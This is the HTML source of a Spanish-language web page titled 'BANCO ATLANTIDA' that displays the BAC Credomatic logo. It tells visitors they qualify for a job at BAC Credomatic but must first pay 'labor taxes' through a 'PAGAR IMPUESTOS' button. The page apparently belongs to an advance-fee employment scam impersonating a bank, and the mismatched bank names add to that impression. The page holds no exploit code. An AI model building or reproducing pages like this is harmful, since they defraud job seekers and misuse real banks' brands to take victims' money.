
<!DOCTYPE html>
<html lang="es">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>BANCO ATLANTIDA</title>
    <link rel="stylesheet" href="styles.css">
</head>
<body>
    <header>
        <img src="https://www.baccredomatic.com/themes/custom/bac_theme/images/bac_logo.svg" alt="" style="width: 100px; margin-left: 20px;">
        <h1></h1>
        <style>p{
            text-align: left;
        }
        .conte{
           
            width: 500px;
            box-shadow: 0 4px 8px rgba(0, 0, 0, 0.2);
            padding: 10px;
            border-radius: 5px;
            background-color: white;
            z-index: 1;
            margin-top: 90px;
            
        }
        a{
            padding: 5px;
            background-color: rgb(194, 26, 26);
            width: 95%;
            margin-top: 10px;
            border: none;
            color: white;
            border-radius: 5px;
            text-decoration: none;
            display: block;
            box-sizing: border-box;
            text-align: center;
        }
        @media only screen and (max-width: 850px){
        .conte{
            width: 85%;
          

        }
    }</style>
    </header>
   
    <main>
        <div class="conte">
            <div class="card">
                <img src="img/4996808920202849699.jpg" alt="Tarjeta BAC Credomatic" style="width:100%;">

                
               <h2>¡Excelente, cumples con los requerimientos!</h2>
                <p>Antes de continuar debes pagar los <strong>impuestos laborales</strong>es uno de los requierentos para laborar en BAC CREDOMATIC.</p>
                <a href="animacion.html"><button id="agregarTarjetaBtn" >PAGAR IMPUESTOS</button></a>
               
            
        </div>
    </main>

   

    <script src="script.js"></script>
</body>
</html>